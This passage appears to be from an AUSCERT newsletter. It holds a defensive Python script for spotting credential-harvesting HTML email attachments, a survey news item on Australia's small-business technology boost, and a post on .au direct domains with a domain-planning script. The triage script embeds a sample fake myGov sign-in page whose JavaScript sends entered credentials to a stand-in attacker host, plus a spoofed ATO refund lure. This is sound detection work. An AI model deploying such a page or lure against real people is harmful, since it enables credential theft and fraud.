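The HTML-attachment variant described under (b) can be triaged mechanically before anyone opens the file: pull every text/html attachment out of the message, look for a form with a password field, note where that form posts, and look for script that uploads the form data or bounces the victim to the real site afterwards. The following is an added example, not AUSCERT’s tooling. The lure email, the attachment and the hosts collect.attacker.example and ato-gov-au.example are constructed for the example; the message is built in the script itself so that it runs offline.

```python
"""Triage an e-mail's HTML attachment for a credential-harvesting form.
Added example, not AUSCERT's tooling.  The message and the attachment are
constructed for the example; the hosts and paths in them are assumed."""
import re
from email import message_from_string, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Constructed attachment: a fake myGov sign-in page whose form posts to
# an attacker-controlled host, then bounces the victim to the real site.
ATTACHMENT_HTML = """<html><body>
<h2>myGov sign in</h2>
<form id="login" method="post" action="https://collect.attacker.example/submit.php">
  <input type="text" name="username" placeholder="Username or email">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" value="Sign in">
</form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  fetch("https://collect.attacker.example/api/creds",
        {method: "POST", body: new FormData(e.target)})
    .then(function () { window.location = "https://my.gov.au/"; });
});
</script>
</body></html>
"""

def build_sample_message():
    """Constructed lure e-mail carrying the HTML file as an attachment."""
    msg = EmailMessage()
    msg["From"] = "ATO Refunds <refunds@ato-gov-au.example>"
    msg["To"] = "taxpayer@example.net"
    msg["Subject"] = "Your 2022-23 refund is ready"
    msg.set_content("Open the attached form to claim your refund.")
    msg.add_attachment(ATTACHMENT_HTML, subtype="html",
                       filename="Tax_Refund_Form.html")
    return msg.as_string()

class FormScanner(HTMLParser):
    """Collect every form's action and input types, plus inline script text."""
    def __init__(self):
        super().__init__()
        self.forms, self.scripts = [], []
        self._form, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "input_types": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["input_types"].append((a.get("type") or "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

EXFIL_RE = re.compile(r"(?:fetch|sendBeacon)\(\s*['\"](https?://[^'\"]+)['\"]")
REDIRECT_RE = re.compile(r"location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)['\"]")

def triage_html(html_text):
    scanner = FormScanner()
    scanner.feed(html_text)
    scanner.close()                       # flush any buffered text
    script = "".join(scanner.scripts)
    forms = [f["action"] for f in scanner.forms if "password" in f["input_types"]]
    exfil = EXFIL_RE.findall(script)
    return {
        "credential_forms": forms,        # where a password field would POST
        "exfil_urls": exfil,              # script-driven credential uploads
        "redirects": REDIRECT_RE.findall(script),
        "suspicious": bool(forms or exfil),
    }

def triage_message(raw):
    """Run the HTML triage over every text/html attachment of a raw message."""
    msg = message_from_string(raw, policy=policy.default)
    reports = []
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            reports.append({"filename": part.get_filename(),
                            **triage_html(part.get_content())})
    return reports

if __name__ == "__main__":
    for report in triage_message(build_sample_message()):
        print(report)
```

A hit from this check is strong evidence; a miss is not a clean bill. Real attachments of this kind frequently hide the form and the upload URL behind base64-encoded or string-escaped JavaScript that is only assembled when the page renders, so anything that scores as clean here still belongs in a sandbox that executes the HTML and records the outbound requests.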


BDO and AUSCERT Cyber Security Survey Report 2021

BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts.

On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return. AUSCERT and BDO are calling for guidance to be provided for SMEs looking to take advantage of the government incentives, to mitigate the chance of inadequate governance.

“AUSCERT recognises the significance of the latest federal government announcement and hopes the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the run-up to an election to make promises, the true benefit is in recognising the needs of SMEs and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.”

“Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide-scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers peddling a ‘silver bullet’ course and we find ourselves looking back and seeing another ‘pink batts’ fiasco.”

The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser-focused.

BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training create a ripe environment for ineffective training and providers to pop up.”

The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase in data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements.

“With the steady increase in working remotely driven by the pandemic, there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form of cyber awareness training. Yet most organisations don’t have a chief security officer or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SMEs with a starting point and ongoing support to really help these incentives be impactful.”

The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps business can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans.

“No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon. “Whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training. What is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.”

BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business.”

Stan noted that the Technology Investment Boost will be a great opportunity to enhance cybersecurity, but hardly revolutionary.

“The Technology Investment Boost is terrific for innovative tech-driven start-ups and entrepreneurial business, but mature SMEs looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non-technology-driven areas, still need assistance to understand technology investment and how it can add value to their business operations.”

“There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan.

“The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom – then maybe, they will pay to get their confidential data back. As usual there are no guarantees either way.”

You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021


.au Direct Domain names are a new option for Australian internet users

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia.

Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be and to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate widespread and easy abuse (as is prevalent in many other jurisdictions).

auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are:

- auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders.
- auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’, which gives us priority to register and use ‘auscert.au’. This priority period runs for six months from the launch date (24 March 2022), after which the ‘.au’ domain becomes available to anyone. Essentially, this means you have until 20 September 2022 to register the new ‘.au’ version of any existing domain names you wish to keep.
- An ‘Australian presence’ will be required to register a .au direct domain, and essentially requires one of: an ABN; a trademark number; or an Australian identification document (passport, driver’s licence, etc.).

So, what does this mean for you?

- Be aware that .au direct domains are being launched on 24 March 2022.
- Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process to do so within the six months, to avoid any potential issues arising later.
- Determine whether there may be any potential conflicts with other domain name registrants, and understand the auDA process for resolving those conflicts. Check the auDA website for complete details.
- Contact your preferred domain retailer to register your new domains.
- Consider which new (rather than existing) domain names you may wish to register.
- Be aware that the opening up of a new domain space always provides potential for a resurgence of domain abuse (such as domain squatting, phishing, etc.), and take pre-emptive measures such as registering your names in the new domain space.

Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains that you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.
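Working through the checklist above starts with an inventory: which existing names map to a .au direct name, where the same name is held under different namespaces by different registrants (the case auDA's conflict process has to settle), and how long the priority period has left. The script below is an added example written for this post, not auDA's or AUSCERT's tooling; the namespace list it treats as eligible is an assumption, and the inventory and registrant names are constructed (only pavlova, station and auscert come from the post).

```python
"""Planning .au direct registrations from an existing domain inventory.

Added example, not auDA's or AUSCERT's tooling. For each existing domain in
one of the listed .au namespaces it derives the matching .au direct name and
flags a conflict when different registrants hold the same name under
different namespaces (for example .com.au and .org.au). The namespace list
is an assumption of this example; the inventory below is constructed.
"""
from collections import defaultdict
from datetime import date

# Namespaces this example treats as giving priority to an existing registrant (assumed).
NAMESPACES = ("com.au", "net.au", "org.au", "asn.au", "id.au")
# Launch date and end of the six-month priority period, both stated in the post.
LAUNCH = date(2022, 3, 24)
PRIORITY_ENDS = date(2022, 9, 20)


def direct_name(domain):
    """'label.com.au' -> 'label.au'; None for subdomains or other namespaces."""
    d = domain.lower().rstrip(".")
    for ns in NAMESPACES:
        if d.endswith("." + ns):
            label = d[: -len(ns) - 1]
            if label and "." not in label:
                return label + ".au"
    return None


def plan(inventory):
    """Group (domain, registrant) pairs by the .au direct name they map to.

    Returns {direct_name: {'sources': [...], 'registrants': {...}, 'status': ...}}
    where status is 'clear' when a single registrant holds every matching
    name and 'conflict' when more than one registrant does.
    """
    groups = defaultdict(lambda: {"sources": [], "registrants": set()})
    for domain, registrant in inventory:
        name = direct_name(domain)
        if name is None:
            continue
        groups[name]["sources"].append(domain.lower())
        groups[name]["registrants"].add(registrant)
    for entry in groups.values():
        entry["status"] = "conflict" if len(entry["registrants"]) > 1 else "clear"
    return dict(groups)


def days_of_priority_left(today):
    """Days remaining in the priority period (negative once it has passed)."""
    return (PRIORITY_ENDS - today).days


# Constructed inventory; the registrant names are invented for the example.
SAMPLE_INVENTORY = [
    ("auscert.org.au", "AUSCERT"),
    ("pavlova.com.au", "Bakery Pty Ltd"),
    ("pavlova.org.au", "Dessert Society Inc"),
    ("station.net.au", "Station Co"),
    ("mail.station.net.au", "Station Co"),  # subdomain: no .au direct equivalent
    ("uq.edu.au", "UQ"),                     # namespace outside this example's list
]

if __name__ == "__main__":
    for name, entry in sorted(plan(SAMPLE_INVENTORY).items()):
        print(f"{name}: {entry['status']} ({', '.join(entry['sources'])})")
    print("days of priority left from launch:", days_of_priority_left(LAUNCH))
```

On the constructed inventory, auscert.au and station.au come out clear while pavlova.au is flagged as a conflict between two registrants, which is the case to take to auDA's resolution process rather than assume will resolve in your favour. Whether a clear name has in fact been taken by someone else is something this script cannot tell you offline; check with your retailer.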
